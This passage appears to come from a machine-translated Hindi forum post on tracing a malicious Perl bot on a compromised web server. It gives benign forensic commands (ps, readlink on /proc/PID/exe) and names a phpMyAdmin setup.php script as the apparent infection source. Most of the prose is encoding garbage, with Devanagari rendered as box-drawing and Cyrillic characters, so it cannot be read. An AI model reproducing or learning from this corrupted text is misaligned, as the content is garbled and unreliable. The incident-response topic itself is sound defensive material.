рд╕реВрдЪрд┐рдд рдХрд░рддрд╛ рд╣реИред



UPD4: рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ z123 рд╕реЗ : рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╢реБрд░реВ рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдХрд╛рд░реНрдпрдХреНрд░рдо рдХрд╛ рдкрддрд╛ рдХреИрд╕реЗ рдХрд░реЗрдВ (рдпрджрд┐ рдЗрд╕реЗ рдмрджрд▓рд╛ рдЧрдпрд╛ рдерд╛):

ps -p 123 -o comm

readlink / proc / 123 / exe (123 рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рдВрдЦреНрдпрд╛ рдХреЗ рд╕рд╛рде рдмрджрд▓реЗрдВ)

рд▓реЗрдХрд┐рди, рджреБрд░реНрднрд╛рдЧреНрдп рд╕реЗ, рд╡реЗ рд╕реНрдЯрд╛рд░реНрдЯрдЕрдк рдкреИрд░рд╛рдореАрдЯрд░ рдФрд░ рдлрд╝реЛрд▓реНрдбрд░ рдирд╣реАрдВ рджрд┐рдЦрд╛рддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдЗрд╕ рдмреЙрдЯ рдХреЗ рд▓рд┐рдП рдХреЗрд╡рд▓ рдкрд░реНрд▓ рдФрд░ / usr / рдмрд┐рди / рдкрд░реНрд▓ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдореЗрдореЛрд░реА рдбрдВрдк рдХреЗ рдмрд┐рдирд╛, рдореБрдЭреЗ рдЕрднреА рддрдХ рдЙрд╕ рдлрд╝реЛрд▓реНрдбрд░ рдХреЛ рдЦреЛрдЬрдиреЗ рдХрд╛ рдХреЛрдИ рддрд░реАрдХрд╛ рдирд╣реАрдВ рдорд┐рд▓рд╛ рд╣реИ рдЬрд╣рд╛рдВ рд╕реЗ рд╕рдВрдХреНрд░рдордг рдЖрдпрд╛ (рдпрд╛рдиреА /var/www/phpmyadmin3/scripts/setup.php



рд▓рд╛рдЗрди рдвреВрдВрдвреЗрдВ) /var/www/phpmyadmin3/scripts/setup.php



)



All Articles